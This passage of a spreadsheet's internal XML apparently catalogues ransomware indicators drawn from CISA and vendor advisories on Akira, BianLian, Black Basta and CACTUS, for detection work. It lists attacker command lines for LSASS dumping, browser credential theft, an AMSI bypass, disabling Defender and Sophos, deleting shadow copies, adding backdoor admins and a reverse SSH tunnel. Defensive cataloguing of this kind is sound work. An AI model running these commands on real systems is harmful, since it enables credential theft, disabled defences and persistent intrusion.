  </si>
  <si>
    <t>Metasploit</t>
  </si>
  <si>
    <t>ransomhub-eid0008</t>
  </si>
  <si>
    <t>ransomhub-eid0009</t>
  </si>
  <si>
    <t>Sliver</t>
  </si>
  <si>
    <t>A penetration testing toolset which allows for remote command and
control of systems.</t>
  </si>
  <si>
    <t>ransomhub-eid0010</t>
  </si>
  <si>
    <t>SMBExec</t>
  </si>
  <si>
    <t>ransomhub-eid0011</t>
  </si>
  <si>
    <t>CrackMapExec</t>
  </si>
  <si>
    <t>Pentest Toolset</t>
  </si>
  <si>
    <t>ransomhub-eid0012</t>
  </si>
  <si>
    <t>Kerberoast</t>
  </si>
  <si>
    <t>ransomhub-eid0013</t>
  </si>
  <si>
    <t>AngryIPScanner</t>
  </si>
  <si>
    <t>ransomhub-eid0014</t>
  </si>
  <si>
    <t>C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\kerbrute.exe</t>
  </si>
  <si>
    <t>ransomhub-eid0015</t>
  </si>
  <si>
    <t xml:space="preserve">C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\crackmapexec.exe </t>
  </si>
  <si>
    <t>ransomhub-eid0016</t>
  </si>
  <si>
    <t>C:\Users\%USERNAME%\Downloads\Anydesk.exe</t>
  </si>
  <si>
    <t>ransomhub-eid0017</t>
  </si>
  <si>
    <t>C:\Users\%USERNAME%\Downloads\mimikatz_trunk\x64\mimikatz.exe</t>
  </si>
  <si>
    <t>ransomhub-eid0018</t>
  </si>
  <si>
    <t>C:\Users\backupexec\Downloads\x64\mimikatz.exe</t>
  </si>
  <si>
    <t>{ "data": "2024-11", "url": "https://www.cisa.gov/sites/default/files/2024-11/aa24-131a-joint-csa-stopransomware-black-basta_3.pdf", "tags": ["black basta"]}</t>
  </si>
  <si>
    <t>{ "data": "2023-06", "url": "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html", "tags": ["8base"]}</t>
  </si>
  <si>
    <t>ngrok-pid</t>
  </si>
  <si>
    <t>nltest-pid</t>
  </si>
  <si>
    <t>netclt-pid</t>
  </si>
  <si>
    <t>rclone-pid</t>
  </si>
  <si>
    <t>mimikatz-pid</t>
  </si>
  <si>
    <t>anydesk-pid</t>
  </si>
  <si>
    <t>adfind-pid</t>
  </si>
  <si>
    <t>netscan-pid</t>
  </si>
  <si>
    <t>netsh-pid</t>
  </si>
  <si>
    <t>reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /* v fAllowToGetHelp /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>vss-pid</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>psexec-pid</t>
  </si>
  <si>
    <t>wmic-pid</t>
  </si>
  <si>
    <t>mshta-pid</t>
  </si>
  <si>
    <t>gmer-pid</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>Count of eid_type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</si>
</sst>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vey Wargo" refreshedDate="45770.357370949074" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="191" xr:uid="{F4BEE312-974D-2F45-8DA4-70BE098B96AF}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="6">
    <cacheField name="eid" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1" count="16">
        <m/>
        <s v="adfind-pid"/>
        <s v="anydesk-pid"/>
        <s v="mimikatz-pid"/>
        <s v="ngrok-pid"/>
        <s v="rclone-pid"/>
        <s v="nltest-pid"/>
        <s v="netclt-pid"/>
        <s v="netscan-pid"/>
        <s v="netsh-pid"/>
        <s v="vss-pid"/>
        <s v="pshell-pid"/>
        <s v="psexec-pid"/>
        <s v="wmic-pid"/>
        <s v="mshta-pid"/>
        <s v="gmer-pid"/>
      </sharedItems>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems count="10">
        <s v="generic"/>
        <s v="htool"/>
        <s v="cmdline"/>
        <s v="tool"/>
        <s v="exploit"/>
        <s v="script"/>
        <s v="file_path"/>
        <s v="c2"/>
        <s v="mdeav_alerts"/>
        <s v="mdeedr_alerts"/>
      </sharedItems>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="11">
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf&quot;, &quot;tags&quot;: [&quot;Akira&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-11&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-11/aa23-136a-joint-csa-stopransomware-bianlian-ransomware-group.pdf&quot;, &quot;tags&quot;: [&quot;bian lian&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-11&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-11/aa24-131a-joint-csa-stopransomware-black-basta_3.pdf&quot;, &quot;tags&quot;: [&quot;black basta&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-05&quot;, &quot;url&quot;: &quot;https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection&quot;, &quot;tags&quot;: [&quot;CACTUS&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-06&quot;, &quot;url&quot;: &quot;https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html&quot;, &quot;tags&quot;: [&quot;8base&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2025-02&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2025-02/aa25-050a-stopransomware-ghost-cring-ransomware.pdf&quot;, &quot;tags&quot;: [&quot;Ghost&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-02&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-02/aa24-060a-stopransomware-phobos-ransomware_1.pdf&quot;, &quot;tags&quot;: [&quot;Phobos&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-12&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2023-12/aa23-352a-stopransomware-play-ransomware.pdf&quot;, &quot;tags&quot;: [&quot;Play&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-11&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/&quot;, &quot;tags&quot;: [&quot;royal&quot;, &quot;DEV-0569&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-01&quot;, &quot;url&quot;: &quot;https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf&quot;, &quot;tags&quot;: [&quot;royal&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-08-29&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-09/aa24-242a-stopransomware-ransomhub-ransomware_1.pdf&quot;, &quot;tags&quot;: [&quot;RansomHub&quo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1">
  <r>
    <s v="akira-eid0001"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Encrypted files are appended with either a .akira or .powerranges extension."/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0002"/>
    <x v="1"/>
    <x v="1"/>
    <s v="Adfind"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0003"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Advanced IP Scanner"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0004"/>
    <x v="2"/>
    <x v="1"/>
    <s v="AnyDesk"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0005"/>
    <x v="0"/>
    <x v="1"/>
    <s v="LaZagne"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0006"/>
    <x v="0"/>
    <x v="1"/>
    <s v="PCHunter64"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0007"/>
    <x v="3"/>
    <x v="1"/>
    <s v="MimiKatz"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0008"/>
    <x v="4"/>
    <x v="1"/>
    <s v="Ngrok"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0009"/>
    <x v="5"/>
    <x v="1"/>
    <s v="Rclone"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0010"/>
    <x v="0"/>
    <x v="1"/>
    <s v="SoftPerfect"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0011"/>
    <x v="0"/>
    <x v="1"/>
    <s v="WinSCP"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0012"/>
    <x v="6"/>
    <x v="2"/>
    <s v="nltest /dclist: "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0013"/>
    <x v="6"/>
    <x v="2"/>
    <s v="nltest /DOMAIN_TRUSTS"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0014"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net group “Domain admins” /dom"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0015"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net localgroup “Administrators” /dom "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0016"/>
    <x v="0"/>
    <x v="2"/>
    <s v="tasklist"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0017"/>
    <x v="0"/>
    <x v="2"/>
    <s v="rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0018"/>
    <x v="0"/>
    <x v="2"/>
    <s v="cmd.exe /Q /c esentutl.exe /y &quot;C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;firefox_profile_id&gt;.defaultrelease\key4.db&quot; /d &quot;C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;firefox_profile_id&gt;.defaultrelease\key4.db.tmp” "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0019"/>
    <x v="0"/>
    <x v="2"/>
    <s v="cmd.exe /Q /c esentutl.exe /y &quot;C:\Users\&lt;username&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data&quot; /d &quot;C:\Users\&lt;username&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0020"/>
    <x v="0"/>
    <x v="2"/>
    <s v="powershell.exe -Command &quot;Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="akira-eid0021"/>
    <x v="0"/>
    <x v="3"/>
    <s v="CloudZilla"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="bianlian-eid0001"/>
    <x v="0"/>
    <x v="4"/>
    <s v="ProxyShell Exloit  (CVE-2021-34473, CVE-2021-34523, and CVE2021-31207)"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0002"/>
    <x v="4"/>
    <x v="1"/>
    <s v="Ngrok"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0003"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Rsocks SOCKS5"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0004"/>
    <x v="8"/>
    <x v="1"/>
    <s v="Softperfect Netscan"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0005"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Advanced Port Scanner"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0006"/>
    <x v="0"/>
    <x v="1"/>
    <s v="SharpShares"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0007"/>
    <x v="0"/>
    <x v="1"/>
    <s v="PingCastle"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0008"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Impacket"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0009"/>
    <x v="0"/>
    <x v="1"/>
    <s v="mega"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0010"/>
    <x v="0"/>
    <x v="2"/>
    <s v="[Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’).GetField(‘amsiInitFailed’,’NonPublic,* Static’).SetValue($null,$true)"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0011"/>
    <x v="0"/>
    <x v="2"/>
    <s v="cmd.exe /Q /c for /f “tokens=1,2 delims= “^%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””’) do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\&lt;file&gt;.csv full"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0012"/>
    <x v="0"/>
    <x v="2"/>
    <s v="cmd.exe /Q /c net user &lt;admin&gt; /active:yes 1&gt; \\127.0.0.1\C$\Windows\Temp\&lt;folder&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0013"/>
    <x v="0"/>
    <x v="2"/>
    <s v="cmd.exe /Q /c net user &quot;&lt;admin&gt;&quot;&lt;password&gt; 1&gt; \\127.0.0.1\C$\Windows\Temp\&lt;folder&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0014"/>
    <x v="0"/>
    <x v="2"/>
    <s v="cmd.exe /Q /c quser 1&gt; \\127.0.0.1\C$\Windows\Temp\&lt;folder&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0015"/>
    <x v="0"/>
    <x v="2"/>
    <s v="dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0016"/>
    <x v="0"/>
    <x v="2"/>
    <s v="dump.exe -no-pass -just-dc user.local/&lt;fileserver.local&gt;\@&lt;local_ip&gt;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0017"/>
    <x v="0"/>
    <x v="2"/>
    <s v="exp.exe -n &lt;fileserver.local&gt; -t &lt;local_ip&gt;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0018"/>
    <x v="0"/>
    <x v="2"/>
    <s v="findstr /spin &quot;password&quot; *.* &gt;C:\Users\training\Music\&lt;file&gt;.txt"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0019"/>
    <x v="0"/>
    <x v="2"/>
    <s v="ldap.exe -u user\&lt;user&gt; -p &lt;password&gt; ldap://&lt;local_ip&gt; "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0020"/>
    <x v="0"/>
    <x v="2"/>
    <s v="logoff"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0021"/>
    <x v="0"/>
    <x v="2"/>
    <s v="mstsc"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0022"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net group /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0023"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net group 'Domain Admins' /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0024"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net group 'Domain Computers' /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0025"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net user /domain "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0026"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net.exe localgroup &quot;Remote Desktop Users&quot; &lt;user&gt; /add"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0027"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net.exe user &lt;admin&gt; &lt;password&gt; /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0028"/>
    <x v="9"/>
    <x v="2"/>
    <s v="netsh.exe advfirewall firewall add rule &quot;name=allow RemoteDesktop&quot; dir=in * protocol=TCP localport=&lt;port num&gt; action=allow"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0029"/>
    <x v="9"/>
    <x v="2"/>
    <s v="netsh.exe advfirewall firewall set rule &quot;group=remote desktop&quot; new enable=Yes"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0030"/>
    <x v="6"/>
    <x v="2"/>
    <s v="nltest /dclist"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0031"/>
    <x v="6"/>
    <x v="2"/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0032"/>
    <x v="0"/>
    <x v="2"/>
    <s v="ping.exe -4 -n 1 *"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0033"/>
    <x v="0"/>
    <x v="2"/>
    <s v="quser; ([adsisearcher]&quot;(ObjectClass=computer)&quot;).Find All().count;([adsisearcher]&quot;(ObjectClass=user)&quot;).FindAll().count;[Security.Principal.WindowsIdentity]::GetCurrent() | select name;net user&quot;$env:USERNAME&quot; /domain; (Get-WmiObject -class Win32_OperatingSystem).Caption; GetWmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem; net group &quot;domain admins&quot; /domain; nltest /dclist:; nltest /DOMAIN_TRUSTS "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0034"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg.exe add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal *Server\WinStations\RDP-Tcp&quot; /v UserAuthentication /t REG_DWORD /d 0 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0035"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg.exe add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /* v fAllowToGetHelp /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0036"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg.exe add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint *Defense\TamperProtection\Config&quot; /t REG_DWORD /v SAVEnabled /d 0 /f "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0037"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg.exe add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint *Defense\TamperProtection\Config&quot; /t REG_DWORD /v SEDEnabled /d 0 /f "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0038"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg.exe ADD *HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Sophos\SAVService\TamperProtection /t REG_DWORD /v Enabled /d 0 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0039"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg.exe copy hklm\system\CurrentControlSet\services\tvnserver *hklm\system\CurrentControlSet\control\safeboot\network\tvnserver /s /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0040"/>
    <x v="0"/>
    <x v="2"/>
    <s v="s.exe /threads:50 /ldap:all /verbose /outfile:c:\users\&lt;user&gt;\desktop\1.txt"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0041"/>
    <x v="0"/>
    <x v="2"/>
    <s v="schtasks.exe /RU SYSTEM /create /sc ONCE /&lt;user&gt; /tr &quot;cmd.exe /crundll32.exe c:\programdata\netsh.dll,Entry&quot; /ST 04:43"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="bianlian-eid0042"/>
    <x v="0"/>
    <x v="2"/>
    <s v="start-process PowerShell.exe -arg C:\Users\Public\Music\&lt;file&gt;.ps1 -WindowStyle Hidden"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="blackbasta-eid0001"/>
    <x v="8"/>
    <x v="1"/>
    <s v="SoftPerfect NetScan"/>
    <s v="A network scanner (netscan.exe) used to ping computers, scan ports,_x000a_discover shared folders, and retrieve information about network devices_x000a_via Windows Management Instrumentation (WMI), Simple Network_x000a_Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It_x000a_also scans for remote services, registry, files, and performance counters. "/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0002"/>
    <x v="10"/>
    <x v="0"/>
    <s v="Black Basta affiliates have used the vssadmin.exe program to delete shadow copies. "/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0003"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Black Basta affiliates have used PowerShell to disable antivirus products."/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0004"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Black Basta affiliates have used social engineering techniques to convince users to execute legitimate remote access tools such as AnyDesk and Microsoft’s Quick Assist"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0005"/>
    <x v="2"/>
    <x v="1"/>
    <s v="AnyDesk"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0006"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Black Basta affiliates have deployed a tool called Backstab to disable endpoint detection and response (EDR) tooling."/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0007"/>
    <x v="0"/>
    <x v="1"/>
    <s v="backstab"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0008"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Mimikatz"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0009"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Black Basta affiliates have used credential scraping tools like Mimikatz, Zerologon, NoPac and PrintNightmare for privilege escalation."/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0010"/>
    <x v="0"/>
    <x v="1"/>
    <s v="WInSCP"/>
    <s v="Windows Secure Copy is a free and open source SSH File Transfer_x000a_Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy_x000a_protocol client. Black Basta affiliates have used it to transfer data from a_x000a_compromised network to actor-controlled accounts."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0011"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Splashtop"/>
    <s v="Remote desktop software that allows remote access to devices for_x000a_support, access, and collaboration."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0012"/>
    <x v="0"/>
    <x v="1"/>
    <s v="ScreenConnect"/>
    <s v="Remote support, access, and meeting software that allows users to control_x000a_devices remotely over the internet."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0013"/>
    <x v="5"/>
    <x v="1"/>
    <s v="Rclone"/>
    <s v="A command line program used to sync files with cloud storage services_x000a_such as Mega."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0014"/>
    <x v="11"/>
    <x v="1"/>
    <s v="Powershell"/>
    <s v="A cross-platform task automation solution made up of a command-line_x000a_shell, a scripting language, and a configuration management framework,_x000a_which runs on Windows, Linux, and macOS."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0015"/>
    <x v="12"/>
    <x v="1"/>
    <s v="PSExec"/>
    <s v="A tool designed to run programs and execute commands on remote_x000a_systems."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0016"/>
    <x v="3"/>
    <x v="1"/>
    <s v="Mimikatz"/>
    <s v="A tool that allows users to view and save authentication credentials such_x000a_as Kerberos tickets. Black Basta affiliates have used it to aid in privilege_x000a_escalation."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0017"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Cobalt Strike"/>
    <s v="A penetration testing tool used by security professions to test the security_x000a_of networks and systems. Black Basta affiliates have used it to assist with_x000a_lateral movement and file execution."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0018"/>
    <x v="0"/>
    <x v="1"/>
    <s v="BITSAdmin"/>
    <s v="A command-line utility that manages downloads/uploads between a client_x000a_and server by using the Background Intelligent Transfer Service (BITS) to_x000a_perform asynchronous file transfers."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0019"/>
    <x v="2"/>
    <x v="1"/>
    <s v="Anydesk"/>
    <s v="A remote monitoring and management tool used by Black Basta affiliates_x000a_to gain access to a victim user’s endpoint."/>
    <x v="2"/>
  </r>
  <r>
    <s v="blackbasta-eid0020"/>
    <x v="0"/>
    <x v="0"/>
    <s v=" .basta or otherwise random file extension is added to file names and a ransom note titled readme.txt is left on the compromised system"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="cactus-eid0001"/>
    <x v="0"/>
    <x v="2"/>
    <s v="echo off %programdata%\sshd\ssh-keygen -f %programdata%\sshd\config\id_rsa -t rsa -N &quot;&quot; icacls %programdata%\sshd\config\keys\id_rsa /inheritance:r icacls %programdata%\sshd\config\keys\id_rsa /grant:r &quot;%username%&quot;:&quot;(R)&quot; icacls %programdata%\sshd\config\id_rsa /inheritance:r icacls %programdata%\sshd\config\id_rsa /grant:r &quot;%username%&quot;:&quot;(R)&quot; schtasks.exe /create /sc minute /mo 1 /tn &quot;SSH Server&quot; /rl highest /np /tr &quot;%programdata%\sshd\sshd.exe -f %programdata%\sshd\config\sshd_config&quot; schtasks.exe /create /sc minute /mo 1 /tn &quot;SSH Key Exchange&quot; /rl highest /np /tr &quot;%programdata%\sshd\ssh.exe -i %programdata%\sshd\config\keys\id_rsa -N -R 22682:127.0.0.1:2222 -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 root@"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0002"/>
    <x v="0"/>
    <x v="2"/>
    <s v="&gt;&gt;&gt; Get-ADComputer -Filter * -Properties * | select ipv4Address &gt; ips.txt_x000a_&gt;&gt;&gt; Get-ADUser - Filter * -Properties * &gt; users.txt_x000a_&gt;&gt;&gt; Get-Eventlog -LogName Security -InstanceID 4624 | Sort-Object -Property Time -Descending | Select-Object -Property Time -ExpandProperty Message &gt; c:\users\public\ad.txt_x000a_&gt;&gt;&gt; ping "/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0003"/>
    <x v="0"/>
    <x v="2"/>
    <s v="TASKKILL /F /IM msiexec.exe_x000a_msiexec.exe /x {3E8909A1-55FD-46C4-8FC0-604313331AA2} /QN /norestart_x000a_msiexec.exe /x {36E5BC45-019B-49A5-A722-E64FF83AE375} /QN /norestart_x000a_msiexec.exe /x {9B5749A2-35AE-435C-BF34-51884160AB09} /QN /norestart_x000a_&lt;…snip…&gt;_x000a_c:\windows\BEST_uninstallTool.exe /bdparams_x000a_del &quot;%~f0&quot;"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0004"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net user Adm1nBac P@ssW0dDP@ssW /add"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0005"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net user Adm1nBac /active:yes"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0006"/>
    <x v="7"/>
    <x v="2"/>
    <s v="net localgroup Administrators Adm1nBac /add"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0007"/>
    <x v="0"/>
    <x v="2"/>
    <s v="bcdedit /set {default} safeboot minimal"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0008"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v LegalNoticeText /t REG_SZ /d &quot;&quot; /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0009"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v LegalNoticeCaption /t REG_SZ /d &quot;&quot; /f"/>
    <m/>
    <x v="3"/>
  </r>
